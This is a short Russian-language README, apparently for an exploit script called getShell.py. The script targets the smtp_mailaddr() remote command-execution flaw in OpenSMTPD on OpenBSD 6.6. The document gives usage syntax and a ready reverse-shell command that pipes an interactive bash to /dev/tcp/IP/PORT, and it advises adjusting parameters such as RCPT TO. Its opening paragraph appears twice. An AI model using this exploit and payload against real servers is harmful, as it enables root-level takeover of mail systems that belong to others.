
Эта уязвимость существует в функции “smtp_mailaddr()” почтового сервера OpenSMTPD, входящего в состав OpenBSD, и затрагивает OpenBSD версии 6.6. Она позволяет атакующему выполнять произвольные shell-команды, например «sleep 66», с правами пользователя root.
Эта уязвимость существует в функции «smtp_mailaddr()» почтового сервера OpenSMTPD в OpenBSD и затрагивает версию OpenBSD 6.6. Она позволяет атакующему выполнять произвольные команды оболочки, например «sleep 66», от имени пользователя root
python3 getShell.py <targetIp> <targetPort> <command>
Если вам нужен reverse shell, запустите его так:
python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
Измените некоторые параметры в этом эксплойте, например RCPT to и что-то ещё (при необходимости)
Смотрите эту статью для более подробного объяснения
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/